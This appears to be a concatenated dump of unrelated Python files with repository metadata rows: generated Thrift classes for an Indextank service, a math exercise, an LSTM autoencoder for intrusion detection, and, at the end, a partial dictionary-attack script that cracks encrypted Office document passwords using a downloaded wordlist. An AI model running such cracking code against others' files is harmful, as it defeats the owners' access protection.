if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.functionIndex = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('removeScoreFunction_args')
if self.functionIndex != None:
oprot.writeFieldBegin('functionIndex', TType.I32, 1)
oprot.writeI32(self.functionIndex)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class removeScoreFunction_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('removeScoreFunction_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class listScoreFunctions_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('listScoreFunctions_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class listScoreFunctions_result:
"""
Attributes:
- success
- ite
"""
thrift_spec = (
(0, TType.MAP, 'success', (TType.I32,None,TType.STRING,None), None, ), # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ite=None,):
self.success = success
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype234, _vtype235, _size233 ) = iprot.readMapBegin()
for _i237 in xrange(_size233):
_key238 = iprot.readI32();
_val239 = iprot.readString();
self.success[_key238] = _val239
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('listScoreFunctions_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I32, TType.STRING, len(self.success))
for kiter240,viter241 in self.success.items():
oprot.writeI32(kiter240)
oprot.writeString(viter241)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stats_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('stats_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stats_result:
"""
Attributes:
- success
- ite
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (IndexerStats, IndexerStats.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ite=None,):
self.success = success
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = IndexerStats()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('stats_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_stats_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_stats_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_stats_result:
"""
Attributes:
- success
- ite
"""
thrift_spec = (
(0, TType.MAP, 'success', (TType.STRING,None,TType.STRING,None), None, ), # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, ite=None,):
self.success = success
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype243, _vtype244, _size242 ) = iprot.readMapBegin()
for _i246 in xrange(_size242):
_key247 = iprot.readString();
_val248 = iprot.readString();
self.success[_key247] = _val248
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_stats_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.success))
for kiter249,viter250 in self.success.items():
oprot.writeString(kiter249)
oprot.writeString(viter250)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class force_gc_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('force_gc_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class force_gc_result:
"""
Attributes:
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'ite', (IndextankException, IndextankException.thrift_spec), None, ), # 1
)
def __init__(self, ite=None,):
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.ite = IndextankException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('force_gc_result')
if self.ite != None:
oprot.writeFieldBegin('ite', TType.STRUCT, 1)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getStatus_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getStatus_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getStatus_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getStatus_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class startFullRecovery_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('startFullRecovery_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class startFullRecovery_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('startFullRecovery_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| [
"adrian@ghosthack.com"
] | adrian@ghosthack.com |
716813bc48c41feec512bf5d75c9c1fef2654e12 | 0f9d7f7d57055228688cdac61f8b3d65b657994a | /task1.py | 1fcd46efc38ca5348df69253fedcda0a6eefadee | [] | no_license | alex-chugunov/LR1 | 7053d70df135abb382dc1f451cf2017e60a09b93 | a0f8f1e4d9474114834483ac4ae009068eeaff6a | refs/heads/master | 2022-12-23T17:47:44.579714 | 2020-09-20T08:24:14 | 2020-09-20T08:24:14 | 296,906,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | import math as mt
expr19 = 124 / ((45 * 3 + 7) - 2 / 5)
print(expr19)
a = float(input("Введите a: \n"))
b = float(input("Введите b: \n"))
c = float(input("Введите c: \n"))
d = float(input("Введите d: \n"))
e = float(input("Введите e: \n"))
m = float(input("Введите m: \n"))
n = float(input("Введите n: \n"))
p = float(input("Введите p: \n"))
try:
ch1 = mt.pow(2, n) * (mt.sin(a) + mt.cos(b * c / mt.pow(d, m)))
ch2 = mt.sin(a) + mt.cos(b * c / mt.pow(d, m))
znm = mt.log10(mt.pow(a + b * c / mt.pow(d, m), 1 / 3)) - e / mt.pow(2, p)
expr9 = ch1 * ch2 / znm
print(expr9)
except:
print("Ошибка!")
| [
"57045051+alex-chugunov@users.noreply.github.com"
] | 57045051+alex-chugunov@users.noreply.github.com |
3fd31d51426d4a90ef31e02a3b42f541f6e7c801 | fc528608295ec9f2accd7c3b9c0d16de07843ed6 | /legacy/LSTM_autoencoder.py | ac75e6f5374c9c81c0893f299745ed8be50979ac | [] | no_license | irijije/Thesis_Master | 77ae6c1899613ac1fd517dfcd21ea99401bdc6da | cc6cd583f311fc5b6d1cb75210eac3660945df52 | refs/heads/main | 2023-05-03T12:54:26.575975 | 2021-05-27T13:59:42 | 2021-05-27T13:59:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,813 | py | import os
import sys
import pandas as pd
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from config import Config
from preprocess import show_tsne
os.environ["CUDA_VISIBLE_DEVICES"] = '1'
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
tf.config.experimental.set_virtual_device_configuration(
gpus[0],
[tf.config.experimental.VirtualDeviceConfiguration(memory_limit=8196)])
except RuntimeError as e:
print(e)
class LSTM(tf.keras.Model):
def __init__(self):
super(LSTM, self).__init__()
self.X_train, self.y_train = np.load(Config.DATAPATH+"data_train.npy"), np.load(Config.DATAPATH+"labels_train.npy")
self.X_test, self.y_test = np.load(Config.DATAPATH+"data_test.npy"), np.load(Config.DATAPATH+"labels_test.npy")
scaler = StandardScaler()
self.X_train = scaler.fit_transform(self.X_train.reshape(-1, self.X_train.shape[-1])).reshape(self.X_train.shape).astype('float32')
self.X_test = scaler.transform(self.X_test.reshape(-1, self.X_test.shape[-1])).reshape(self.X_test.shape).astype('float32')
# self.X_train = self.padding(self.X_train)
# self.X_test = self.padding(self.X_test)
self.encoder = tf.keras.Sequential([
tf.keras.layers.LSTM(32, activation='relu', input_shape=(self.X_train.shape[1], self.X_train.shape[2]), return_sequences=False),
tf.keras.layers.RepeatVector(self.X_train.shape[1]),
])
self.decoder = tf.keras.Sequential([
tf.keras.layers.LSTM(32, activation='relu', input_shape=(self.X_train.shape[1], 32), return_sequences=True),
tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(self.X_train.shape[2])),
])
self.optimizer = tf.keras.optimizers.Adam()
def compute_loss(self, x):
z = self.encoder(x)
x_ = self.decoder(z)
loss = tf.reduce_mean(tf.square(tf.abs(x - x_)))
return loss
@tf.function
def train_step(self, x):
with tf.GradientTape() as tape:
loss = self.compute_loss(x)
gradients = tape.gradient(loss, self.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
return loss
def train(self, epochs=Config.EPOCHS):
self.X_train = tf.data.Dataset.from_tensor_slices(self.X_train).batch(Config.BATCH_SIZE)
losses = []
for epoch in range(epochs):
print("epoch: {} training".format(epoch))
for batch in self.X_train:
#batch = self.padding(batch)
loss = self.train_step(batch)
tf.print(loss)
losses.append(loss.numpy())
self.encoder.save('models/encoder.h5')
self.decoder.save('models/decoder.h5')
plt.plot(losses, linewidth=2, label='Train')
plt.legend(loc='upper right')
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.savefig("figures/lstm_loss.png")
plt.show()
def show_test(self):
x = self.X_test[:2]
self.encoder = tf.keras.models.load_model('models/encoder.h5')
self.decoder = tf.keras.models.load_model('models/decoder.h5')
z = self.encoder(x, training=False)
x_ = self.decoder(z, training=False)
print("\nx: {}".format(np.array2string(np.array(x[0]), prefix="x: ",
formatter={'float_kind':lambda x: "%7.4f" % x})))
print("\nz: {}".format(np.array2string(np.array(z[0]), prefix="z: ",
formatter={'float_kind':lambda z: "%7.4f" % z})))
print("\nx_: {}".format(np.array2string(np.array(x_[0]), prefix="x_: ",
formatter={'float_kind':lambda x: "%7.4f" % x})))
def test(self, name='test'):
if name=='train':
x = self.X_train
self.X_train = tf.data.Dataset.from_tensor_slices(self.X_train).batch(Config.BATCH_SIZE)
y = self.y_train
else:
x = self.X_test
self.X_test = tf.data.Dataset.from_tensor_slices(self.X_test).batch(Config.BATCH_SIZE)
y = self.y_test
self.encoder = tf.keras.models.load_model('models/encoder.h5')
self.decoder = tf.keras.models.load_model('models/decoder.h5')
z = self.encoder(x, training=False).numpy()
x_ = self.decoder(z, training=False).numpy()
np.save(f"data/lstm/data_{name}", z)
np.save(f"data/lstm/labels_{name}", y)
show_tsne(z, y, 'lstm')
mse = np.mean(np.power(x.reshape(x.shape[0], -1) - x_.reshape(x_.shape[0], -1), 2), axis=1)
error_df = pd.DataFrame({'Reconstruction_error': mse,
'True_class': y})
groups = error_df.groupby('True_class')
_, ax = plt.subplots()
for name, group in groups:
ax.plot(group.index, group.Reconstruction_error, marker='o', ms=3.5, linestyle='',
label= "Attack" if name == 1 else "Normal")
ax.legend()
plt.title("Reconstruction error for different classes")
plt.ylabel("Reconstruction error")
plt.xlabel("Data point index")
plt.savefig("figures/reconstruction_error.png")
plt.show()
def padding(self, X):
T = int(Config.MAX_TIMESTEP/Config.UNIT_TIMESTEP)
X_ = np.zeros((len(X)*T, Config.MAX_TIMESTEP, Config.N_FEATURES))
for i, x in enumerate(X):
for j in range(T):
X_[i*T+j, T-j-1:] = x[T-j-1:]
return X_.astype('float32')
if __name__ == "__main__":
lstm = LSTM()
lstm.train()
#lstm.test('train')
#lstm.show_test()
| [
"wnsrud3611@gmail.com"
] | wnsrud3611@gmail.com |
ccf91ec29fce9d8bcf26eaf56f6445a4a54c28d3 | c1dd9d57da11ac57f0a2096204c3c781be34ef9d | /src/doc-break.py | f91534f3293e093125e1f1ad67e939328fdb30e2 | [
"MIT"
] | permissive | andreblue/doc-breaker | f70116ad1515691f6a5acd8fb424168510034311 | bf847a3b4e0a5effca718dc03c4cac418ccaed23 | refs/heads/master | 2020-05-16T00:55:17.190916 | 2019-04-22T00:44:12 | 2019-04-22T00:44:12 | 182,590,787 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,155 | py | import msoffcrypto
import sys, getopt
import os
import urllib.request
def download_PasswordList():
#Grabbed from https://github.com/danielmiessler/SecLists
url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt'
try:
urllib.request.urlretrieve(url, "10000-password-top-list.txt")
except Exception as e:
handleException(e)
sys.exit()
def handleException(e):
print ('Error: ' + str(e))
def breakFile(fileHandle, passwordStr):
try:
fileHandle.load_key(password=passwordStr)
except Exception as e:
if str(e) != 'Key verification failed':
handleException(e)
else:
print ('Password FOUND!')
print ('Saving document as decrypted_file.docx next to main script')
print ('Password was: "' + passwordStr + '"')
fileHandle.decrypt(open('decrypted_file.docx', "wb"))
sys.exit()
